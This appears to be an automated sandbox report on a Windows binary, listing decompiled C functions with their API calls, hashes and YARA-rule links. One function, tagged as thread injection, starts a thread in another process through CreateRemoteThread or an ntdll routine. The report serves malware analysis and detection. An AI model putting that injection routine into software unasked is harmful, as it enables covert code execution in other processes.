                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                                                                  0x00409a4a
                                                                                                                                                                  0x00409a4f
                                                                                                                                                                  0x00409a56
                                                                                                                                                                  0x00409a5e
                                                                                                                                                                  0x00409a60
                                                                                                                                                                  0x00409a6e
                                                                                                                                                                  0x00409a6e
                                                                                                                                                                  0x00409a60
                                                                                                                                                                  0x00409a71
                                                                                                                                                                  0x00409a76
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409a78
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00409a89

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                  • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                                                                  • API String ID: 946536540-379566740
                                                                                                                                                                  • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                  • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                                                                  • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                                                                  0x00404a62
                                                                                                                                                                  0x00404a6a
                                                                                                                                                                  0x00404a6e
                                                                                                                                                                  0x00404a71
                                                                                                                                                                  0x00404a74
                                                                                                                                                                  0x00404a92
                                                                                                                                                                  0x00404a92
                                                                                                                                                                  0x00404a76
                                                                                                                                                                  0x00404a76
                                                                                                                                                                  0x00404a87
                                                                                                                                                                  0x00404a90
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00404a90
                                                                                                                                                                  0x00404aa3
                                                                                                                                                                  0x00404aa7
                                                                                                                                                                  0x00404aa7
                                                                                                                                                                  0x00404a94
                                                                                                                                                                  0x00404a98

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetDlgItem.USER32 ref: 00404A52
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                                                                  • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$Item
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3888421826-0
                                                                                                                                                                  • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                  • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                                                                  • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                                                                  • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 004072D8, Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 93%
                                                                                                                                                                  			E004072D8(void* __ecx, void* __eflags, void* _a4, short* _a8) {
				long _v8;
				void _v8199;
				char _v8200;

				E0040B550(0x2004, __ecx);
				_v8200 = 0;
				memset( &_v8199, 0, 0x1fff);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff,  &_v8200, 0x1fff, 0, 0);
				return WriteFile(_a4,  &_v8200, strlen( &_v8200),  &_v8, 0);
			}






                                                                                                                                                                  0x004072e0
                                                                                                                                                                  0x004072f7
                                                                                                                                                                  0x004072fd
                                                                                                                                                                  0x00407316
                                                                                                                                                                  0x00407342

                                                                                                                                                                  APIs
                                                                                                                                                                  • memset.MSVCRT ref: 004072FD
                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000), ref: 00407316
                                                                                                                                                                  • strlen.MSVCRT ref: 00407328
                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00407339
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharFileMultiWideWritememsetstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2754987064-0
                                                                                                                                                                  • Opcode ID: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                  • Instruction ID: b20814eff52bbcc052d034fa9df9783175f47b69a9638c3bed99c582471ba408
                                                                                                                                                                  • Opcode Fuzzy Hash: a01a9356340fd52416386d9a0609ab8b35de944153756caad9cad7d66f149dcb
                                                                                                                                                                  • Instruction Fuzzy Hash: E7F0FFB740022CBEEB05A7949DC9DDB776CDB08358F0001B6B715E2192D6749E448BA8
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040A272, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70threadinjectionCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                                  			E0040A272(struct HINSTANCE__** __eax, void* _a4, _Unknown_base(*)()* _a8, void* _a12, DWORD* _a16) {
				void* _v8;
				char _v12;
				char* _v20;
				long _v24;
				intOrPtr _v28;
				char* _v36;
				signed int _v40;
				void _v44;
				char _v48;
				char _v52;
				struct _OSVERSIONINFOW _v328;
				void* __esi;
				signed int _t40;
				intOrPtr* _t44;
				void* _t49;
				struct HINSTANCE__** _t54;
				signed int _t55;

				_t54 = __eax;
				_v328.dwOSVersionInfoSize = 0x114;
				GetVersionExW( &_v328);
				if(_v328.dwMajorVersion < 6) {
					return CreateRemoteThread(_a4, 0, 0, _a8, _a12, 4, _a16);
				}
				E0040A1EF(_t54);
				_t44 =  *((intOrPtr*)(_t54 + 4));
				if(_t44 != 0) {
					_t55 = 8;
					memset( &_v44, 0, _t55 << 2);
					_v12 = 0;
					asm("stosd");
					_v36 =  &_v12;
					_v20 =  &_v52;
					_v48 = 0x24;
					_v44 = 0x10003;
					_v40 = _t55;
					_v28 = 0x10004;
					_v24 = 4;
					_a16 = 0;
					_t40 =  *_t44( &_a16, 0x1fffff, 0, _a4, _a8, _a12, 1, 0, 0, 0,  &_v48, _t49);
					asm("sbb eax, eax");
					return  !( ~_t40) & _a16;
				}
				return 0;
			}




















                                                                                                                                                                  0x0040a27d
                                                                                                                                                                  0x0040a286
                                                                                                                                                                  0x0040a290
                                                                                                                                                                  0x0040a29d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a32f
                                                                                                                                                                  0x0040a29f
                                                                                                                                                                  0x0040a2a4
                                                                                                                                                                  0x0040a2ad
                                                                                                                                                                  0x0040a2b6
                                                                                                                                                                  0x0040a2bc
                                                                                                                                                                  0x0040a2be
                                                                                                                                                                  0x0040a2c4
                                                                                                                                                                  0x0040a2c8
                                                                                                                                                                  0x0040a2ce
                                                                                                                                                                  0x0040a2e3
                                                                                                                                                                  0x0040a2ed
                                                                                                                                                                  0x0040a2fb
                                                                                                                                                                  0x0040a2fe
                                                                                                                                                                  0x0040a305
                                                                                                                                                                  0x0040a30c
                                                                                                                                                                  0x0040a30f
                                                                                                                                                                  0x0040a313
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040a31a
                                                                                                                                                                  0x0040a338

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetVersionExW.KERNEL32(?,751468A0,00000000), ref: 0040A290
                                                                                                                                                                  • CreateRemoteThread.KERNEL32(?,00000000,00000000,?,?,00000004,?), ref: 0040A32F
                                                                                                                                                                    • Part of subcall function 0040A1EF: LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                                                                                    • Part of subcall function 0040A1EF: GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressCreateLibraryLoadProcRemoteThreadVersion
                                                                                                                                                                  • String ID: $
                                                                                                                                                                  • API String ID: 283512611-3993045852
                                                                                                                                                                  • Opcode ID: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                  • Instruction ID: f7bb912936b7b9019fec647a10c74351ea71fc4cb5320a39ef1905a9d188216f
                                                                                                                                                                  • Opcode Fuzzy Hash: d6a2f9152dd1fe2f0352f3baa78907b361cfe50d89148d1dfcfba5149de364ff
                                                                                                                                                                  • Instruction Fuzzy Hash: CC216DB290020DEFDF11CF94DD44AEE7BB9FB88704F00802AFA05B6190D7B59A54CBA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00401676, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                                  			E00401676(void* __ecx, intOrPtr* __esi, void* __eflags, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				char _v80;
				signed short _v65616;
				void* _t27;
				intOrPtr _t28;
				void* _t34;
				intOrPtr _t39;
				intOrPtr* _t51;
				void* _t52;

				_t51 = __esi;
				E0040B550(0x1004c, __ecx);
				_t39 = 0;
				_push(0);
				_push( &_v8);
				_v8 =  *((intOrPtr*)(_a4 + 0x1c));
				_push(L"Lines");
				_t27 =  *((intOrPtr*)( *__esi))();
				if(_v8 > 0) {
					do {
						_t6 = _t39 + 1; // 0x1
						_t28 = _t6;
						_push(_t28);
						_push(L"Line%d");
						_v12 = _t28;
						_push(0x1f);
						_push( &_v80);
						L0040B1EC();
						_t52 = _t52 + 0x10;
						_push(0x7fff);
						_push(0x40c4e8);
						if( *((intOrPtr*)(_t51 + 4)) == 0) {
							_v65616 = _v65616 & 0x00000000;
							 *((intOrPtr*)( *_t51 + 0x10))( &_v80,  &_v65616);
							_t34 = E004054DF(_a4, _t51,  &_v65616);
						} else {
							_t34 =  *((intOrPtr*)( *_t51 + 0x10))( &_v80, E00405581(_a4, _t39));
						}
						_t39 = _v12;
					} while (_t39 < _v8);
					return _t34;
				}
				return _t27;
			}













                                                                                                                                                                  0x00401676
                                                                                                                                                                  0x0040167e
                                                                                                                                                                  0x0040168a
                                                                                                                                                                  0x0040168c
                                                                                                                                                                  0x00401690
                                                                                                                                                                  0x00401691
                                                                                                                                                                  0x00401696
                                                                                                                                                                  0x0040169d
                                                                                                                                                                  0x004016a2
                                                                                                                                                                  0x004016aa
                                                                                                                                                                  0x004016aa
                                                                                                                                                                  0x004016aa
                                                                                                                                                                  0x004016ad
                                                                                                                                                                  0x004016ae
                                                                                                                                                                  0x004016b3
                                                                                                                                                                  0x004016b9
                                                                                                                                                                  0x004016bb
                                                                                                                                                                  0x004016bc
                                                                                                                                                                  0x004016c1
                                                                                                                                                                  0x004016c8
                                                                                                                                                                  0x004016cd
                                                                                                                                                                  0x004016ce
                                                                                                                                                                  0x004016ea
                                                                                                                                                                  0x004016ff
                                                                                                                                                                  0x0040170c
                                                                                                                                                                  0x004016d0
                                                                                                                                                                  0x004016e3
                                                                                                                                                                  0x004016e3
                                                                                                                                                                  0x00401711
                                                                                                                                                                  0x00401714
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00401719
                                                                                                                                                                  0x0040171c

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _snwprintf
                                                                                                                                                                  • String ID: Line%d$Lines
                                                                                                                                                                  • API String ID: 3988819677-2790224864
                                                                                                                                                                  • Opcode ID: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                                                                  • Instruction ID: 1021665491e9d2d06496d958327cd8fefc515fbb55266dd5f91e98284186a054
                                                                                                                                                                  • Opcode Fuzzy Hash: 85c35154c4290c7e71ee3589cd3dab7edefba6c8c670df13eed484ab7778891e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4C110071A00208EFCB15DF98C8C1D9EB7B9EF48704F1045BAF645E7281D778AA458B68
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040507A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040507A(intOrPtr __eax, wchar_t* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v20;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				wchar_t* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v76;
				struct tagOFNA _v80;

				_v76 = __eax;
				_v68 = _a4;
				_v64 = 0;
				_v44 = 0;
				_v36 = 0;
				_v32 = _a8;
				_v20 = _a12;
				_v80 = 0x4c;
				_v56 = 1;
				_v52 = __esi;
				_v48 = 0x104;
				_v28 = 0x81804;
				if(GetOpenFileNameW( &_v80) == 0) {
					return 0;
				} else {
					wcscpy(__esi, _v52);
					return 1;
				}
			}















                                                                                                                                                                  0x00405080
                                                                                                                                                                  0x00405086
                                                                                                                                                                  0x0040508b
                                                                                                                                                                  0x0040508e
                                                                                                                                                                  0x00405091
                                                                                                                                                                  0x00405097
                                                                                                                                                                  0x0040509d
                                                                                                                                                                  0x004050a4
                                                                                                                                                                  0x004050ab
                                                                                                                                                                  0x004050b2
                                                                                                                                                                  0x004050b5
                                                                                                                                                                  0x004050bc
                                                                                                                                                                  0x004050cb
                                                                                                                                                                  0x004050e0
                                                                                                                                                                  0x004050cd
                                                                                                                                                                  0x004050d1
                                                                                                                                                                  0x004050dc
                                                                                                                                                                  0x004050dc

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileNameOpenwcscpy
                                                                                                                                                                  • String ID: L
                                                                                                                                                                  • API String ID: 3246554996-2909332022
                                                                                                                                                                  • Opcode ID: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                  • Instruction ID: bc55e530e402ba4b599a228f817f204aa1fc4279979982f23bca087f07049b97
                                                                                                                                                                  • Opcode Fuzzy Hash: a51a7b57d6ecd1b98ae1f97c69f64cb7c1c2e9715c85319fb07a92e86122e8f3
                                                                                                                                                                  • Instruction Fuzzy Hash: 9A015FB1D102199FDF40DFA9D885ADEBBF4BB08304F14812AE915F6240E77495458F98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040906D, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 58%
                                                                                                                                                                  			E0040906D(struct HINSTANCE__** __eax, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __esi;
				_Unknown_base(*)()* _t10;
				void* _t12;
				struct HINSTANCE__** _t13;

				_t13 = __eax;
				_t12 = 0;
				if(E00408F72(__eax) != 0) {
					_t10 = GetProcAddress( *_t13, "LookupAccountSidW");
					if(_t10 != 0) {
						_t12 =  *_t10(0, _a4, _a8, _a12, _a16, _a20, _a24);
					}
				}
				return _t12;
			}







                                                                                                                                                                  0x00409072
                                                                                                                                                                  0x00409074
                                                                                                                                                                  0x0040907d
                                                                                                                                                                  0x00409086
                                                                                                                                                                  0x0040908e
                                                                                                                                                                  0x004090a5
                                                                                                                                                                  0x004090a5
                                                                                                                                                                  0x0040908e
                                                                                                                                                                  0x004090ac

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcAddress.KERNEL32(?,LookupAccountSidW), ref: 00409086
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc
                                                                                                                                                                  • String ID: LookupAccountSidW$Y@
                                                                                                                                                                  • API String ID: 190572456-2352570548
                                                                                                                                                                  • Opcode ID: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                  • Instruction ID: 3ebfd29b958db2e29df2983e37ea976ab6b1d16e8490ad6d4f073a9de280f7a1
                                                                                                                                                                  • Opcode Fuzzy Hash: ef5ceafcaa1143e80c32773d35785430279aa9a6fc3cb1ecefeef801cdbe6fb2
                                                                                                                                                                  • Instruction Fuzzy Hash: F5E0E537100109BBDF125E96DD01CAB7AA79F84750B144035FA54E1161D6368821A794
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                                                                  0x0040ac59
                                                                                                                                                                  0x0040ac60
                                                                                                                                                                  0x0040ac68
                                                                                                                                                                  0x0040ac6d
                                                                                                                                                                  0x0040ac75
                                                                                                                                                                  0x0040ac7b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0040ac7b
                                                                                                                                                                  0x0040ac6d
                                                                                                                                                                  0x0040ac80

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                                                                    • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                                                                    • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000009.00000002.271065664.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000009.00000002.271054640.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271092950.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271101490.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000009.00000002.271114198.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                                                                  • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                                                                  • API String ID: 946536540-880857682
                                                                                                                                                                  • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                  • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                                                                  • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                                                                  • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406670, Relevance: 5.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 90%
                                                                                                                                                                  			E00406670(char** __esi, void* __eflags) {
				char* _t30;
				char** _t39;

				_t39 = __esi;
				 *__esi = "cf@";
				__esi[0xb8] = 0;
				_t30 = E00404FA4(0x338, __esi);
				_push(0x14);
				__esi[0xcb] = 0;
				__esi[0xa6] = 0;
				__esi[0xb9] = 0;
				__esi[0xba] = 0xfff;
				__esi[8] = 0;
				__esi[1] = 0;
				__esi[0xb7] = 1;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[2] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[3] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_push(0x14);
				_t39[4] = _t30;
				L0040B26C();
				if(_t30 == 0) {
					_t30 = 0;
				} else {
					_t30[4] = 0;
					_t30[0x10] = 0;
					_t30[8] = 0;
					_t30[0xc] = 0x100;
					 *_t30 = 0;
				}
				_t39[5] = _t30;
				return _t39;
			}





                                                                                                                                                                  0x00406670
                                                                                                                                                                  0x0040667a
                                                                                                                                                                  0x00406680
                                                                                                                                                                  0x00406686
                                                                                                                                                                  0x0040668b
                                                                                                                                                                  0x0040668d
                                                                                                                                                                  0x00406693
                                                                                                                                                                  0x00406699
                                                                                                                                                                  0x0040669f
                                                                                                                                                                  0x004066a9
                                                                                                                                                                  0x004066ac
                                                                                                                                                                  0x004066af
                                                                                                                                                                  0x004066b9
                                                                                                                                                                  0x004066c7
                                                                                                                                                                  0x004066d9
                                                                                                                                                                  0x004066c9
                                                                                                                                                                  0x004066c9
                                                                                                                                                                  0x004066cc
                                                                                                                                                                  0x004066cf
                                                                                                                                                                  0x004066d2
                                                                                                                                                                  0x004066d5
                                                                                                                                                                  0x004066d5
                                                                                                                                                                  0x004066db
                                                                                                                                                                  0x004066dd
                                                                                                                                                                  0x004066e0
                                                                                                                                                                  0x004066e8
                                                                                                                                                                  0x004066fa
                                                                                                                                                                  0x004066ea
                                                                                                                                                                  0x004066ea
                                                                                                                                                                  0x004066ed
                                                                                                                                                                  0x004066f0
                                                                                                                                                                  0x004066f3
                                                                                                                                                                  0x004066f6
                                                                                                                                                                  0x004066f6
                                                                                                                                                                  0x004066fc
                                                                                                                                                                  0x004066fe
                                                                                                                                                                  0x00406701
                                                                                                                                                                  0x00406709
                                                                                                                                                                  0x0040671b
                                                                                                                                                                  0x0040670b
                                                                                                                                                                  0x0040670b
                                                                                                                                                                  0x0040670e
                                                                                                                                                                  0x00406711
                                                                                                                                                                  0x00406714
                                                                                                                                                                  0x00406717
                                                                                                                                                                  0x00406717
                                                                                                                                                                  0x0040671d
                                                                                                                                                                  0x0040671f
                                                                                                                                                                  0x00406722
